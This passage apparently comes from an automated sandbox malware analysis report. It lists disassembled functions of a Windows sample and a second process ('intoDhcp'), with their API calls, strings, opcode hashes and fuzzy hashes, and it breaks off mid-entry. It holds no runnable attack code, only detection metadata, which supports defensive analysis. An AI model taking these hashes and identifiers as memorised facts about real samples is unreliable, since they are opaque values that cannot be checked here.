                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AddressProc$CurrentProcess
                  • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                  • API String ID: 2190909847-396321323
                  • Opcode ID: db245672a4be65ef350dd23defd879dad9d475b3ab4495298b39055b9e1ad6e8
                  • Instruction ID: 15c86c5dd9cd36fc171b1efb315384e179de5d089e76ac5825083cd4834c6fa1
                  • Opcode Fuzzy Hash: db245672a4be65ef350dd23defd879dad9d475b3ab4495298b39055b9e1ad6e8
                  • Instruction Fuzzy Hash: A9112C35A056246FDB169B34DD067AE37E8EF09B20B04C199FC096F241CB359E418BD4
                  Function 00180889 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                  Download Yara Rule
                  APIs
                  • CreateThread.KERNEL32(00000000,00010000,001809D0,?,00000000,00000000), ref: 001808AD
                  • SetThreadPriority.KERNEL32(?,00000000), ref: 001808F4
                    • Part of subcall function 00176E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00176EAF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: Thread$CreatePriority__vswprintf_c_l
                  • String ID: CreateThread failed
                  • API String ID: 2655393344-3849766595
                  • Opcode ID: 82070b587c3193ff87dc3cb8cee35a4b4756164fa3aeba9ca1657e01fb7bba9f
                  • Instruction ID: f355e92cf3c144a4545bc75d739e8e711435b2216d040e5fdcb9f2ebc7bca1cd
                  • Opcode Fuzzy Hash: 82070b587c3193ff87dc3cb8cee35a4b4756164fa3aeba9ca1657e01fb7bba9f
                  • Instruction Fuzzy Hash: 5101F9B53443096FE621BF54ED82FB773A8EB59715F10003DF68A62180CFB1A9859B64
                  Function 0017130B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0017DA98: _swprintf.LIBCMT ref: 0017DABE
                    • Part of subcall function 0017DA98: _strlen.LIBCMT ref: 0017DADF
                    • Part of subcall function 0017DA98: SetDlgItemTextW.USER32(?,001AE154,?), ref: 0017DB3F
                    • Part of subcall function 0017DA98: GetWindowRect.USER32(?,?), ref: 0017DB79
                    • Part of subcall function 0017DA98: GetClientRect.USER32(?,?), ref: 0017DB85
                  • GetDlgItem.USER32(00000000,00003021), ref: 0017134F
                  • SetWindowTextW.USER32(00000000,001A35B4), ref: 00171365
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: ItemRectTextWindow$Client_strlen_swprintf
                  • String ID: 0
                  • API String ID: 2622349952-4108050209
                  • Opcode ID: b1bed3b4a808c37b3bb73c4ddaf669db75753eff33fef045bc021c83f4a3cf57
                  • Instruction ID: 1f43b8804bb4884700718018c2cc02de5ef8bc6b8a87b1e3faf7dad103b6c1e1
                  • Opcode Fuzzy Hash: b1bed3b4a808c37b3bb73c4ddaf669db75753eff33fef045bc021c83f4a3cf57
                  • Instruction Fuzzy Hash: 63F0AF3010024CB6DF260F688C09BEA3BB8BF25725F08C414FD6D559A1C774C995EB10
                  Function 0018084E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                  Download Yara Rule
                  APIs
                  • WaitForSingleObject.KERNEL32(?,000000FF,00180A78,?), ref: 00180854
                  • GetLastError.KERNEL32(?), ref: 00180860
                    • Part of subcall function 00176E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00176EAF
                  Strings
                  • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00180869
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                  • String ID: WaitForMultipleObjects error %d, GetLastError %d
                  • API String ID: 1091760877-2248577382
                  • Opcode ID: 8ec45bb78b96c5a96c343a969b208a240a7ca5a02f564c93f9d059247b3bcbb1
                  • Instruction ID: 2a1cbac4e068f560ee3d4c76b5bdbb9f398723023ab9e1a82eac807ace6ad013
                  • Opcode Fuzzy Hash: 8ec45bb78b96c5a96c343a969b208a240a7ca5a02f564c93f9d059247b3bcbb1
                  • Instruction Fuzzy Hash: 5CD05E75A085212BCA123724AD0AEEFB9159F63730F204719F23E651F5DF210A9186E6
                  Function 0017DA4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                  Download Yara Rule
                  APIs
                  • GetModuleHandleW.KERNEL32(00000000,?,0017D32F,?), ref: 0017DA53
                  • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0017D32F,?), ref: 0017DA61
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: FindHandleModuleResource
                  • String ID: RTL
                  • API String ID: 3537982541-834975271
                  • Opcode ID: 16bdb5df242a8e2aad4ef4565482653778fe704ca370b520d0cd7c568ef0b0ad
                  • Instruction ID: 19eb07921e6897570ba8f95f340308ce34c4bb8a00329acb74efa07705447b45
                  • Opcode Fuzzy Hash: 16bdb5df242a8e2aad4ef4565482653778fe704ca370b520d0cd7c568ef0b0ad
                  • Instruction Fuzzy Hash: 46C01232289350B6EB3127307E0EB837A686B12B12F09044CB255DA5D0DAE5CA8087A0

                  Executed Functions

                  Function 00007FFD9BA03655 Relevance: 1.5, Strings: 1, Instructions: 272COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID: M_H
                  • API String ID: 0-372873180
                  • Opcode ID: eaa44cb343359ce14a4dec5927540bc3b15ca9951742884e06b497110d3bb86a
                  • Instruction ID: 16c55229480ae98bc22ec5140ee7f6d333e5deca5493f964bb6f90ecfc97f0c3
                  • Opcode Fuzzy Hash: eaa44cb343359ce14a4dec5927540bc3b15ca9951742884e06b497110d3bb86a
                  • Instruction Fuzzy Hash: C291B271B1994E8FEB54EB68C8657EC7BE1EF9A310F5001BAD04DD72DACBB428458B40
                  Function 00007FFD9BA0EEC7 Relevance: 5.1, Strings: 4, Instructions: 57COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID: #$O$Q${
                  • API String ID: 0-1370898747
                  • Opcode ID: a80e11950b44468270364eb703143c299ad365823b26c34097594ecee175ab0a
                  • Instruction ID: ce081d18e952e71525ae56a637976d3f4f62a110a48c76b690c62a6e0a62d3b0
                  • Opcode Fuzzy Hash: a80e11950b44468270364eb703143c299ad365823b26c34097594ecee175ab0a
                  • Instruction Fuzzy Hash: 8921E770E0962D8FEB78DF54C8A47E9B6B2BB55301F0141F9D44DA62A1CBB86B80DF40
                  Function 00007FFD9BA0EA63 Relevance: 3.9, Strings: 3, Instructions: 138COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID: >$N$c
                  • API String ID: 0-2822027293
                  • Opcode ID: dee926cbde86f8d9928a42991ba40dd94f260414554b9950dc9d5161046f7e05
                  • Instruction ID: 4e9ad34a771aff76b65910e1ea28bbfdc1b26f5af40d32daa956d80f8c863e5d
                  • Opcode Fuzzy Hash: dee926cbde86f8d9928a42991ba40dd94f260414554b9950dc9d5161046f7e05
                  • Instruction Fuzzy Hash: 9D5124B1E0562D8BDBA8DF18C8947A8B7B1FF59301F0041FAE14DE32A1DA746E818F41
                  Function 00007FFD9BA0C8A9 Relevance: 1.4, Strings: 1, Instructions: 154COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID: %;b
                  • API String ID: 0-1539226091
                  • Opcode ID: 6df25a8e86fc94b323cb2a19373a603f99eabc9817825658dd87bcfcc189e466
                  • Instruction ID: 6ee85b5a8ad0edde7f9e59d14b69165a8e76954f0c9204e82236ad0710662e7a
                  • Opcode Fuzzy Hash: 6df25a8e86fc94b323cb2a19373a603f99eabc9817825658dd87bcfcc189e466
                  • Instruction Fuzzy Hash: C7413831B0D69A4FD726AB6894B15FD7BB0EF46364B0501FBC0C9CB0A3DA2D6586C781
                  Function 00007FFD9BA0DAA9 Relevance: .4, Instructions: 416COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4b70d530357dbb620754714b603c7a0801971f02898629083683983e1a310817
                  • Instruction ID: a7d50a3d729bfd962f70b3f1b2b8280e09716e0d19ab4fdfb68ee3fe929f65aa
                  • Opcode Fuzzy Hash: 4b70d530357dbb620754714b603c7a0801971f02898629083683983e1a310817
                  • Instruction Fuzzy Hash: 78E16D71E1964D8FEBA8EB68C4A47B8B7A1FF59301F0101BED44ED32E6CA756944CB40
                  Function 00007FFD9BA0ADA1 Relevance: .4, Instructions: 362COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 75d58f124b78b010f5f7aa58c38948d6042904b020025004299f39e70373826e
                  • Instruction ID: d97c1133fe27336fb0b2e2618a48c5bb64e8ec7b9b9b233a84c857ef8df0e380
                  • Opcode Fuzzy Hash: 75d58f124b78b010f5f7aa58c38948d6042904b020025004299f39e70373826e
                  • Instruction Fuzzy Hash: 42D12A30E1E61D8FDBB8DBA8C4606BCB7B2FF19705F1150BAD00DA72A1CA796941CB45
                  Function 00007FFD9BA01718 Relevance: .3, Instructions: 289COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a4bb0907c7c6dd5fe6ebead23ab9895d2dd32d0efedec0dc02951031876096f6
                  • Instruction ID: fe9080c16e0a1ae09953ba54ec67e4221a827042c6475637a7a1cca94b32688f
                  • Opcode Fuzzy Hash: a4bb0907c7c6dd5fe6ebead23ab9895d2dd32d0efedec0dc02951031876096f6
                  • Instruction Fuzzy Hash: 5191E031B0DA4D4BDB58DF5C88606B977E2EFAA300F15417AE48DC3292DE30AD06C780
                  Function 00007FFD9BA01D6D Relevance: .2, Instructions: 188COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cb99912466c7feccab08e29f2cb7f3ba43fbddf3f04b39a1d3f02fb3f9fbbcfb
                  • Instruction ID: 318a6cd389d2e86e73fe56092dd835dc920b7e4002da21a43b9d6fdbb2bed6bc
                  • Opcode Fuzzy Hash: cb99912466c7feccab08e29f2cb7f3ba43fbddf3f04b39a1d3f02fb3f9fbbcfb
                  • Instruction Fuzzy Hash: C451CF31B18A4D4FDB58DF4888645BA73E2FFEA304F15457EE49AC3296DE34E9028780
                  Function 00007FFD9BA03291 Relevance: .2, Instructions: 174COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e06de96cc79a306846891bd22dba8c79824241b98c9ea217c020409b28cae60f
                  • Instruction ID: a2abb17d1824adf6c561aba4c4d304754aa826e90cd67d757460af627b39b3ff
                  • Opcode Fuzzy Hash: e06de96cc79a306846891bd22dba8c79824241b98c9ea217c020409b28cae60f
                  • Instruction Fuzzy Hash: 93514C70E0961D8FEB64EBA8C4A46EDB7F1FF5A301F514039D049E72A5DB786A44CB10
                  Function 00007FFD9BA0AF68 Relevance: .2, Instructions: 165COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e099c05fefd026420f614be2fb9d97f0215cca1ce43e4cfe58f01e572e846cef
                  • Instruction ID: e6cbf17d91b4214eb343713785e5816a929f1bc3985914b7083e6f277a74a590
                  • Opcode Fuzzy Hash: e099c05fefd026420f614be2fb9d97f0215cca1ce43e4cfe58f01e572e846cef
                  • Instruction Fuzzy Hash: 0B510770E1991E8EEBA4EBA8C4657EDB7F1FF5A300F11413AD04DE32A1DA7869418B41
                  Function 00007FFD9BA0B05A Relevance: .1, Instructions: 148COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c3df9dde19cb156476e10743fbbcdf0fc28c7e8b2d5480f42e3517801f70e16b
                  • Instruction ID: ef5ae0ad619edbfd12f227cee205a404a08392f3ae0e9dc0978e914768689ca2
                  • Opcode Fuzzy Hash: c3df9dde19cb156476e10743fbbcdf0fc28c7e8b2d5480f42e3517801f70e16b
                  • Instruction Fuzzy Hash: 07414961F0E54E9FE721EBA888A95F977E0FF16300F4544B3D0A8C70A2EE64A504C341
                  Function 00007FFD9BA0C8DD Relevance: .1, Instructions: 147COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f1c05df7b0db5acbfbb168d7a227d63b09b3f8a9beb3133e33f73ae4f4751f35
                  • Instruction ID: 12f9ee34fc10a6dddf842475c21ed113957afcb95db42cb90c35d15ded5429cf
                  • Opcode Fuzzy Hash: f1c05df7b0db5acbfbb168d7a227d63b09b3f8a9beb3133e33f73ae4f4751f35
                  • Instruction Fuzzy Hash: CC513D71E0991D8FEBA4EBA8C8647ADB7A1FF59300F5101BAD04DE32A1DE746945CB40
                  Function 00007FFD9BA02185 Relevance: .1, Instructions: 139COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: eb9dff32e10913d5d219cd46a285c3b4864e7d84e364b96c5950980c2e91feb6
                  • Instruction ID: 60177066923e0be4b28adaa6c2ab4ec12648532de7bd4ec4ad92c492d6212a73
                  • Opcode Fuzzy Hash: eb9dff32e10913d5d219cd46a285c3b4864e7d84e364b96c5950980c2e91feb6
                  • Instruction Fuzzy Hash: 2F411731B0E78E4FE765D7B888655B87BE0EF8B300F0541BBD48DC71A6DE68A9418341
                  Function 00007FFD9BA0BE19 Relevance: .1, Instructions: 136COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 122ec336240bb1637fe8c6173211400dae399395e76b6613f973099f04f843d1
                  • Instruction ID: 485e1a68d9e65e5d0c9a6f864bac605dac9f725de053548db5b6e6f12aef0882
                  • Opcode Fuzzy Hash: 122ec336240bb1637fe8c6173211400dae399395e76b6613f973099f04f843d1
                  • Instruction Fuzzy Hash: 05512A70E0A21D8FDB64DFA4D5A46ED77F1EF19300F51007AE049E72A2DBB8AA44CB50
                  Function 00007FFD9BA0C342 Relevance: .1, Instructions: 109COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d57c76565c841540314910902b51384f51a57dfe2161b978eda61e4ec721aa91
                  • Instruction ID: d6dc8fa9719bcd2b296560ddf7552ff226d00c4f5f45fdd01388906305250c0f
                  • Opcode Fuzzy Hash: d57c76565c841540314910902b51384f51a57dfe2161b978eda61e4ec721aa91
                  • Instruction Fuzzy Hash: 77310770E0981D8FEBA4EBA894A57ECB7B1FF59300F511079D04DE3292DE6869428B40
                  Function 00007FFD9BA0CA60 Relevance: .1, Instructions: 101COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b65f136179407732b78fe240d248da8a896f82f912bd612567241b46108ca1dc
                  • Instruction ID: 56d4f73dda8619d9f1dc24d59a097733bdd20c5ad58f5387e07801bb3f483125
                  • Opcode Fuzzy Hash: b65f136179407732b78fe240d248da8a896f82f912bd612567241b46108ca1dc
                  • Instruction Fuzzy Hash: 1D31A422B0E15B4BF726B7A8B4658FD7790AF42324F0602B7D59E850E3EE6D25848291
                  Function 00007FFD9BA007CC Relevance: .1, Instructions: 98COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6f93e07c0a2ba05ebd0c420aef29ee6980fd7e2f4987433e64e97e48c94ad676
                  • Instruction ID: e7b9d11c31cda95313fd80ff8ba3eb424d4d97dcb37570bc71000f07fe21cf7e
                  • Opcode Fuzzy Hash: 6f93e07c0a2ba05ebd0c420aef29ee6980fd7e2f4987433e64e97e48c94ad676
                  • Instruction Fuzzy Hash: 53215762B0E54F5BE721B7B888795E97BE0FF12314F0A44B7D49DCB0A7DE24A548C284
                  Function 00007FFD9BA00805 Relevance: .1, Instructions: 85COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7db00b220135dd7af8f79653035b63a3d91760e33c59496b4002480f0972a907
                  • Instruction ID: cfca332b9b082cbafa5d50cb182dd49f1be0de1e5678034814aa5bf432a14cb9
                  • Opcode Fuzzy Hash: 7db00b220135dd7af8f79653035b63a3d91760e33c59496b4002480f0972a907
                  • Instruction Fuzzy Hash: 6F218B52B0E18B57E72137BC98791E97B90FF02314F0A40B3D4D9CA093DE14A159C2C4
                  Function 00007FFD9BA0C538 Relevance: .1, Instructions: 85COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7e92d7dfd7cdacb489245b7582ac3d514f87c348792f97afc8ea76eeb4270897
                  • Instruction ID: c1ec92981ffca99d1026d8e541d644957902206bab5e7d905fcf1e98537985a0
                  • Opcode Fuzzy Hash: 7e92d7dfd7cdacb489245b7582ac3d514f87c348792f97afc8ea76eeb4270897
                  • Instruction Fuzzy Hash: BE21C17588E2C90FD7165B705C365E63FB4AF03210F0A01EBE498C64A3E96C2656C322
                  Function 00007FFD9BA035D5 Relevance: .1, Instructions: 83COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b2bed0fda99345f953e9a769a8021293a8802debb99df35d682dd7b640641de5
                  • Instruction ID: 19b955b6f29ed2db3a4a2425bad738e858bd8d749f90eb83fa8edc18f21ff7dd
                  • Opcode Fuzzy Hash: b2bed0fda99345f953e9a769a8021293a8802debb99df35d682dd7b640641de5
                  • Instruction Fuzzy Hash: 48212A30A0A64E8FDB58EFA4C4696BE77E0FF19304F1108BED45AD72A1DA75A6408B40
                  Function 00007FFD9BA03551 Relevance: .1, Instructions: 83COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 76143ae0446e94c14657ff5e5fe2b89744780814a1fcd47242e8f923215fb8b5
                  • Instruction ID: 61d824abd2401056167c8742d79a2b0999fd3553483846a15d4f0ddfeec0edf1
                  • Opcode Fuzzy Hash: 76143ae0446e94c14657ff5e5fe2b89744780814a1fcd47242e8f923215fb8b5
                  • Instruction Fuzzy Hash: 03215C30A0A60E8FEB55EB68C8685BE77F0FF19300F0549BAD45AD71A5DB74E6408B40
                  Function 00007FFD9BA0CB69 Relevance: .1, Instructions: 77COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ac3267641421f344c29b7d3c8bd795045d2f8b14fd4227e6af3d319cb9e12a3f
                  • Instruction ID: 2c57bd3057b4414be22eabae4efbfd15c5fbcf0957b3ac7d3f0acb109eda5fdf
                  • Opcode Fuzzy Hash: ac3267641421f344c29b7d3c8bd795045d2f8b14fd4227e6af3d319cb9e12a3f
                  • Instruction Fuzzy Hash: E921A430B0D68E4FD711EB68C8645EE7BF0EF5A310F0500B7D448D71A2DA68AE44C791
                  Function 00007FFD9BA0CEF3 Relevance: .1, Instructions: 72COMMON
                  Download Yara Rule
                  Memory Dump Source
